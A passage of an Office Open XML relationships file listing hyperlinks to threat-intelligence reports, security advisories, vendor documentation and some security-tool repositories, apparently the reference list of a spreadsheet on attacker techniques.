Target="https://us-cert.cisa.gov/ncas/tips/ST05-016" TargetMode="External"/><Relationship Id="rId486" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cyberforensicator.com/2019/01/20/silence-dissecting-malicious-chm-files-and-performing-forensic-analysis/" TargetMode="External"/><Relationship Id="rId693" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/wp-content/uploads/2021/01/ESET_Kobalos.pdf" TargetMode="External"/><Relationship Id="rId2167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sentinelone.com/blog/teaching-an-old-rat-new-tricks/" TargetMode="External"/><Relationship Id="rId2374" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://eclecticlight.co/2021/09/16/how-to-run-an-app-or-tool-at-startup/" TargetMode="External"/><Relationship Id="rId2581" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://threatpost.com/facebook-launching-pad-phishing-attacks/160351/" TargetMode="External"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt" TargetMode="External"/><Relationship Id="rId346" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/chronicle-blog/winnti-more-than-just-windows-and-gates-e4f03436031a" TargetMode="External"/><Relationship Id="rId553" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/" TargetMode="External"/><Relationship Id="rId760" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/smuggling-hta-files-in-internet-exploreredge/" TargetMode="External"/><Relationship Id="rId998" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/AlessandroZ/LaZagne" TargetMode="External"/><Relationship Id="rId1183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.slideshare.net/kieranjacobsen/lateral-movement-with-power-shell-2" TargetMode="External"/><Relationship Id="rId1390" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.apple.com/guide/mail/reply-to-forward-or-redirect-emails-mlhlp1010/mac" TargetMode="External"/><Relationship Id="rId2027" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/" TargetMode="External"/><Relationship Id="rId2234" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/the-dropping-elephant-actor/75328/" TargetMode="External"/><Relationship Id="rId2441" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments" TargetMode="External"/><Relationship Id="rId2679" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.trimarcsecurity.com/single-post/2018/05/06/Trimarc-Research-Detecting-Password-Spraying-with-Security-Event-Auditing" TargetMode="External"/><Relationship Id="rId2886" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Pwdump" TargetMode="External"/><Relationship Id="rId206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://isc.sans.edu/forums/diary/BankerGoogleChromeExtensiontargetingBrazil/22722/" TargetMode="External"/><Relationship Id="rId413" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20210708035426/https:/www.cobaltstrike.com/downloads/csmanual43.pdf" TargetMode="External"/><Relationship Id="rId858" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html" TargetMode="External"/><Relationship Id="rId1043" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/chipsec/chipsec" TargetMode="External"/><Relationship Id="rId1488" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mcafee.com/blogs/other-blogs/mcafee-labs/clop-ransomware/" TargetMode="External"/><Relationship Id="rId1695" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/en-us/library/aa939914" TargetMode="External"/><Relationship Id="rId2539" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/library/bb490939.aspx" TargetMode="External"/><Relationship Id="rId2746" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://hick.org/code/skape/papers/needle.txt" TargetMode="External"/><Relationship Id="rId2953" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/cli/azure/monitor/diagnostic-settings?view=azure-cli-latest" TargetMode="External"/><Relationship Id="rId620" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.docker.com/engine/api/v1.41/" TargetMode="External"/><Relationship Id="rId718" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.esetnod32.ru/company/viruslab/analytics/doc/Stuxnet_Under_the_Microscope.pdf" TargetMode="External"/><Relationship Id="rId925" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html" TargetMode="External"/><Relationship Id="rId1250" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/winnti-more-than-just-a-game/37029/" TargetMode="External"/><Relationship Id="rId1348" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CustomLogin.html" TargetMode="External"/><Relationship Id="rId1555" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=windows" TargetMode="External"/><Relationship Id="rId1762" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/windows/win32/services/service-control-manager" TargetMode="External"/><Relationship Id="rId2301" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/sensepost/notruler" TargetMode="External"/><Relationship Id="rId2606" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html" TargetMode="External"/><Relationship Id="rId1110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/" TargetMode="External"/><Relationship Id="rId1208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf" TargetMode="External"/><Relationship Id="rId1415" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-1-darkcomet/" TargetMode="External"/><Relationship Id="rId2813" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://researchcenter.paloaltonetworks.com/2018/09/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html" TargetMode="External"/><Relationship Id="rId1622" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/hh875546(v=ws.11)" TargetMode="External"/><Relationship Id="rId1927" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/" TargetMode="External"/><Relationship Id="rId3075" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost" TargetMode="External"/><Relationship Id="rId2091" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.rsaconference.com/writable/presentations/file_upload/ht-209_rivner_schwartz.pdf" TargetMode="External"/><Relationship Id="rId2189" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ssh.com/ssh/tunneling" TargetMode="External"/><Relationship Id="rId270" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://us-cert.cisa.gov/ncas/alerts/aa20-301a" TargetMode="External"/><Relationship Id="rId2396" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong" TargetMode="External"/><Relationship Id="rId3002" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2016/01/ukraine-and-sandworm-team.html" TargetMode="External"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.apple.com/documentation/coreservices" TargetMode="External"/><Relationship Id="rId368" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tools.cisco.com/security/center/resources/integrity_assurance.html" TargetMode="External"/><Relationship Id="rId575" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cybereason.com/blog/cybereason-vs-darkside-ransomware" TargetMode="External"/><Relationship Id="rId782" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.f-secure.com/documents/996508/1030745/CozyDuke" TargetMode="External"/><Relationship Id="rId2049" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.proofpoint.com/us/threat-insight/post/ta505-abusing-settingcontent-ms-within-pdf-files-distribute-flawedammyy-rat" TargetMode="External"/><Relationship Id="rId2256" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/fileless-attacks-against-enterprise-networks/77403/" TargetMode="External"/><Relationship Id="rId2463" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sysdig.com/blog/zoom-into-kinsing-kdevtmpfsi/" TargetMode="External"/><Relationship Id="rId2670" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.trendmicro.com/trendlabs-security-intelligence/info-stealing-file-infector-hits-us-uk/" TargetMode="External"/><Relationship Id="rId228" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/" TargetMode="External"/><Relationship Id="rId435" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx" TargetMode="External"/><Relationship Id="rId642" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.dragos.com/threat/parisite/" TargetMode="External"/><Relationship Id="rId1065" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/list" TargetMode="External"/><Relationship Id="rId1272" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://krebsonsecurity.com/2019/02/a-deep-dive-on-the-recent-widespread-dns-hijacking-attacks/" TargetMode="External"/><Relationship Id="rId2116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://go.recordedfuture.com/hubfs/reports/cta-2021-1208.pdf" TargetMode="External"/><Relationship Id="rId2323" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/microsoft-365/compliance/use-sharing-auditing?view=o365-worldwide" TargetMode="External"/><Relationship Id="rId2530" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/en-us/itpro/windows/keep-secure/how-user-account-control-works" TargetMode="External"/><Relationship Id="rId2768" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/" TargetMode="External"/><Relationship Id="rId2975" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://adsecurity.org/?p=2053" TargetMode="External"/><Relationship Id="rId502" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cybereason.com/blog/cybereason-vs.-clop-ransomware" TargetMode="External"/><Relationship Id="rId947" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://specifications.freedesktop.org/autostart-spec/autostart-spec-latest.html" TargetMode="External"/><Relationship Id="rId1132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/" TargetMode="External"/><Relationship Id="rId1577" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/en-us/library/dn408187.aspx" TargetMode="External"/><Relationship Id="rId1784" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blogs.technet.microsoft.com/timmcmic/2015/06/08/exchange-and-office-365-mail-forwarding-2/" TargetMode="External"/><Relationship Id="rId1991" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/" TargetMode="External"/><Relationship Id="rId2628" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf" TargetMode="External"/><Relationship Id="rId2835" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html" TargetMode="External"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://adsecurity.org/?p=1772" TargetMode="External"/><Relationship Id="rId807" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html" TargetMode="External"/><Relationship Id="rId1437" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf" TargetMode="External"/><Relationship Id="rId1644" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/windows/desktop/ms644670" TargetMode="External"/><Relationship Id="rId1851" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.trendmicro.com/trendlabs-security-intelligence/another-potential-muddywater-campaign-uses-powershell-based-prb-backdoor/" TargetMode="External"/><Relationship Id="rId2902" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/en-us/library/cc754272(v=ws.11).aspx" TargetMode="External"/><Relationship Id="rId3097" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://netzpolitik.org/2015/digital-attack-on-german-parliament-investigative-report-on-the-hack-of-the-left-party-infrastructure-in-bundestag/" TargetMode="External"/><Relationship Id="rId1504" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@menakajain/export-download-ssl-certificate-from-server-site-url-bcfc41ea46a2" TargetMode="External"/><Relationship Id="rId1711" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blogs.microsoft.com/on-the-issues/2019/03/27/new-steps-to-protect-customers-from-hacking/" TargetMode="External"/><Relationship Id="rId1949" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/microsoft-365/commerce/manage-partners?view=o365-worldwide" TargetMode="External"/><Relationship Id="rId292" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303b" TargetMode="External"/><Relationship Id="rId1809" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/library/windows/desktop/aa365738.aspx" TargetMode="External"/><Relationship Id="rId597" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://htmlpreview.github.io/?https://github.com/MatthewDemaske/blogbackup/blob/master/netshell.html" TargetMode="External"/><Relationship Id="rId2180" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cdn.logic-control.com/docs/scadafence/Anatomy-Of-A-Targeted-Ransomware-Attack-WP.pdf" TargetMode="External"/><Relationship Id="rId2278" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.secureworks.com/research/threat-profiles/iron-ritual" TargetMode="External"/><Relationship Id="rId2485" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.talosintelligence.com/2017/05/konni-malware-under-radar-for-years.html" TargetMode="External"/><Relationship Id="rId3024" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.malwarebytes.com/detections/osx-dubrobber/" TargetMode="External"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.trendmicro.com/trendlabs-security-intelligence/rarstone-found-in-targeted-attacks/" TargetMode="External"/><Relationship Id="rId457" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/" TargetMode="External"/><Relationship Id="rId1087" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html" TargetMode="External"/><Relationship Id="rId1294" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://lolbas-project.github.io/lolbas/Binaries/Expand/" TargetMode="External"/><Relationship Id="rId2040" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/prekageo/winhook" TargetMode="External"/><Relationship Id="rId2138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.theregister.com/2015/02/28/uber_subpoenas_github_for_hacker_details/" TargetMode="External"/><Relationship Id="rId2692" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/cglyer/status/985311489782374400" TargetMode="External"/><Relationship Id="rId2997" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html" TargetMode="External"/><Relationship Id="rId664" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/" TargetMode="External"/><Relationship Id="rId871" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html" TargetMode="External"/><Relationship Id="rId969" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf" TargetMode="External"/><Relationship Id="rId1599" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/security/blog/2016/06/09/reverse-engineering-dubnium-2/" TargetMode="External"/><Relationship Id="rId2345" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://news.sophos.com/en-us/2020/09/17/maze-attackers-adopt-ragnar-locker-virtual-machine-technique/" TargetMode="External"/><Relationship Id="rId2552" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/library/dn221960.aspx" TargetMode="External"/><Relationship Id="rId317" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.kb.cert.org/vuls/id/843464" TargetMode="External"/><Relationship Id="rId524" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ncsc.gov.uk/files/Advisory-further-TTPs-associated-with-SVR-cyber-actors.pdf" TargetMode="External"/><Relationship Id="rId731" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/" TargetMode="External"/><Relationship Id="rId1154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://man7.org/linux/man-pages/man2/init_module.2.html" TargetMode="External"/><Relationship Id="rId1361" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.mitre.org/publications/project-stories/going-deep-into-the-bios-with-mitre-firmware-security-research" TargetMode="External"/><Relationship Id="rId1459" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mandiant.com/resources/ukraine-crisis-cyber-threats" TargetMode="External"/><Relationship Id="rId2205" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.secpod.com/blog/winexe/" TargetMode="External"/><Relationship Id="rId2412" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20190717233006/http:/www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf" TargetMode="External"/><Relationship Id="rId2857" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/IEEE_802.1X" TargetMode="External"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/AMIs.html" TargetMode="External"/><Relationship Id="rId829" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://content.fireeye.com/apt/rpt-apt38" TargetMode="External"/><Relationship Id="rId1014" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/LiveMirror/pcshare" TargetMode="External"/><Relationship Id="rId1221" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/iamtheking-and-the-slothfulmedia-malware-family/99000/" TargetMode="External"/><Relationship Id="rId1666" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Win32%2FKasidet" TargetMode="External"/><Relationship Id="rId1873" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pages.nist.gov/800-63-3/sp800-63b.html" TargetMode="External"/><Relationship Id="rId2717" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDF" TargetMode="External"/><Relationship Id="rId2924" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.zscaler.com/blogs/security-research/squirrelwaffle-new-loader-delivering-cobalt-strike" TargetMode="External"/><Relationship Id="rId1319" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ss64.com/osx/launchctl.html" TargetMode="External"/><Relationship Id="rId1526" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-accounts" TargetMode="External"/><Relationship Id="rId1733" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn311461(v=ws.11)" TargetMode="External"/><Relationship Id="rId1940" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://obscuresecurity.blogspot.co.uk/2012/05/gpp-password-retrieval-with-powershell.html" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.amd.com/system/files/TechDocs/20213.pdf" TargetMode="External"/><Relationship Id="rId1800" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/rest/api/compute/virtualmachines/get" TargetMode="External"/><Relationship Id="rId3046" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.passcape.com/windows_password_recovery_vault_explorer" TargetMode="External"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://awakesecurity.com/blog/threat-hunting-for-avaddon-ransomware/" TargetMode="External"/><Relationship Id="rId381" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://citizenlab.org/2016/05/stealth-falcon/" TargetMode="External"/><Relationship Id="rId2062" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.proofpoint.com/us/blog/threat-insight/good-bad-and-web-bug-ta416-increases-operational-tempo-against-european" TargetMode="External"/><Relationship Id="rId241" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.bleepingcomputer.com/news/security/op-sharpshooter-connected-to-north-koreas-lazarus-group/" TargetMode="External"/><Relationship Id="rId479" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://adversary.crowdstrike.com/en-US/adversary/mythic-leopard/" TargetMode="External"/><Relationship Id="rId686" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/2022/02/24/hermeticwiper-new-data-wiping-malware-hits-ukraine" TargetMode="External"/><Relationship Id="rId893" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html" TargetMode="External"/><Relationship Id="rId2367" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.splunk.com/en_us/blog/security/detecting-supernova-malware-solarwinds-continued.html" TargetMode="External"/><Relationship Id="rId2574" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/" TargetMode="External"/><Relationship Id="rId2781" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://researchcenter.paloaltonetworks.com/2015/07/unit-42-technical-analysis-seaduke/" TargetMode="External"/><Relationship Id="rId339" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://research.checkpoint.com/2021/indigozebra-apt-continues-to-attack-central-asia-with-evolving-tools/" TargetMode="External"/><Relationship Id="rId546" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://man7.org/linux/man-pages/man1/dd.1.html" TargetMode="External"/><Relationship Id="rId753" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://enigma0x3.net/2017/09/11/lateral-movement-using-excel-application-and-dcom/" TargetMode="External"/><Relationship Id="rId1176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.irongeek.com/i.php?page=videos/bsidescharm2017/bsidescharm-2017-t111-microsoft-patch-analysis-for-exploitation-stephen-sims" TargetMode="External"/><Relationship Id="rId1383" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/" TargetMode="External"/><Relationship Id="rId2227" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/" TargetMode="External"/><Relationship Id="rId2434" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.symantec.com/security_response/writeup.jsp?docid=2012-051515-3909-99" TargetMode="External"/><Relationship Id="rId2879" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Screensaver" TargetMode="External"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.aws.amazon.com/vpc/latest/userguide/what-is-amazon-vpc.html" TargetMode="External"/><Relationship Id="rId406" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cloudflare.com/learning/ddos/ntp-amplification-ddos-attack/" TargetMode="External"/><Relationship Id="rId960" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add" 